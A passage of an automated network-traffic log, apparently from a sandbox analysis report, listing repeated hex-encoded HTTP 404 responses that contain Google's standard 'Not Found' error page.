31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:11 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:12 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:12 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:14 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:15 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 